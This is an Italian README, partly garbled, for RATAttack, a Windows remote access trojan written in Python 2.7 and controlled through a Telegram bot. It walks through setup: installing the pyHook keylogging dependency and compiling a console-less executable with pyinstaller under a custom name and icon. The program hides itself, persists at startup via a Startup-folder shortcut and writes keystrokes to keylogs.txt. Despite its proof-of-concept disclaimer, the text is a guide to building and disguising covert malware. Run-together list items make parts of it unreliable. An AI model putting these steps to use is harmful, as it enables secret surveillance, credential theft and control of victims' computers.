
Strumento remoto di post-breach per Windows via Telegram
Strumento di post-compromissione remota per Windows via Telegram (Python 2.7), Originariamente creato da Ritiek, fatto il fork e modificato da mvrozanti e poi da me.
L'intero scopo di questo strumento è dimostrare (come "PoC") il controllo di una macchina già compromessa, tramite Telegram. Come per i miei strumenti già scritti, non promuovo attività illegali.
Questa versione modificata usa la Telegram bot API v2, invece della tradizionale v1. Il cambiamento principale è rappresentato dai pulsanti della tastiera invece della digitazione del testo. Proverò ad aggiungere nuove funzionalità, correggere bug ed essere compatibile con l'API v3, dopo aver aggiunto le modifiche necessarie da "mvrozanti". Nel frattempo, i comandi cd, download, upload, run e delete non funzioneranno.

file al bot TelegramGli attuali Remote Administration Tools sul mercato affrontano 2 problemi principali:
Questo RAT supera entrambi questi problemi utilizzando la Telegram bot API.
BotFather.pip install -r requirements.txt.64-bit o 32-bit a seconda del tuo sistema.
pip install pyHook-1.5.1-cp27-cp27m-win_amd64.whl.pip install pyHook-1.5.1-cp27-cp27m-win32.whl.python RATAttack.py.chat_id dalla console, sostituiscilo nello script e commenta la riga return True. Non preoccuparti, lo capirai quando leggerai i commenti nello script.
RATAttack verrà creata nella tua directory di lavoro contenente e qualsiasi file carichi sul bot.Sostituisci il tuo percorso in compileAndRun.bat (eseguirlo avvierà effettivamente l'eseguibile)
Esegui `pyinstaller --onefile --noconsole C:\path\to\RATAttack.py`. Puoi anche passare `--icon=<path\to\icon.ico>` per usare qualsiasi icona personalizzata.
.exe in C:\Python27\Scripts\dist\. Puoi cambiare il nome del .exe in qualsiasi cosa desideri..exe compilato, lo script si nasconderà e infetterà il tuo PC per eseguirsi all'avvio. Puoi tornare alla normalità usando l'opzione /self_destruct o rimuovendo manualmente la directory C:\Users\Username\AppData\Roaming\Portal e C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\portal.lnk (anche se per il momento consiglio di rimuoverle manualmente)..exe nascosto e la posizione e il nome della cartella in cui il .exe nascosto si nasconderà. Per fare ciò, modifica rispettivamente compiled_name e hide_folder.The MIT License
keylogs.txt